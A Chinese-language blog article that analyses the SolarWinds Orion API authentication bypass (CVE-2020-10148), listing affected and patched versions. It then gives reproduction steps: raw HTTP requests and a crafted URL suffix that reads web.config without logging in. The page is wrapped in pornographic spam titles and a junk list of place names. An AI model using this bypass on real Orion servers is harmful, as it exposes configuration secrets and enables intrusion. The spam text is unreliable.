中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

發布時間:2021-12-28 20:10:08 來源:億速云 閱讀:167 作者:柒染 欄目:安全技術

這篇文章給大家介紹SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

SolarWinds Orion API 遠程代碼執行漏洞

(CVE-2020-10148)

一、漏洞概況

SolarWinds Orion API 嵌入在 Orion Core 中,被用于與所有 SolarWinds Orion Platform 產品進行接口。通過在URI請求的Request.PathInfo 部分中包含特定參數,可以繞過 API 身份驗證,這可能允許攻擊者執行未經身份驗證的 API 命令。如果攻擊者將WebResource.adx,scriptResource.adx,i18n.ashx 或 Skipi18n 的 PathInfo 參數附加到對 SolarWinds Orion 服務器的請求,SolarWinds 可能會設置 SkipAuthorization 標志,該標志可能允許處理API請求無需身份驗證。

攻擊者可利用該漏洞遠程執行任意代碼,有專業黑客組織利用該漏洞投遞代號為'SUPERNOVA'的惡意程序。

二、漏洞影響范圍

影響版本:

SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本

安全版本:

SolarWinds Orion 2019.4 HF 6(2020年12月14日發布)

SolarWinds Orion 2020.2.1 HF 2(發布于2020年12月15日)

SolarWinds Orion 2019.2 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.4 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.2 SUPERNOVA補丁(2020年12月23日發布)

三、漏洞復現

訪問/Orion/invalid.aspx.js 路徑,截取請求頭中Location中data獲取

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

將 .i18n.ashx?l=en-US&v=43005.14.L攜帶到下個訪問路徑,從而繞過身份認證。這里訪問的是 web.config文件。

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

直接訪問也行:

http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

關于SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

梁河县| 本溪市| 日照市| 凤台县| 东辽县| 错那县| 尚志市| 加查县| 扎赉特旗| 蒙自县| 赞皇县| 大邑县| 岢岚县| 杨浦区| 鲁甸县| 红河县| 个旧市| 宣汉县| 化州市| 淮阳县| 庆安县| 济源市| 甘南县| 大港区| 晋宁县| 清新县| 微山县| 汾阳市| 宁河县| 临邑县| 奇台县| 大足县| 卓资县| 恩施市| 柏乡县| 惠州市| 北辰区| 广灵县| 诸城市| 新疆| 阿城市|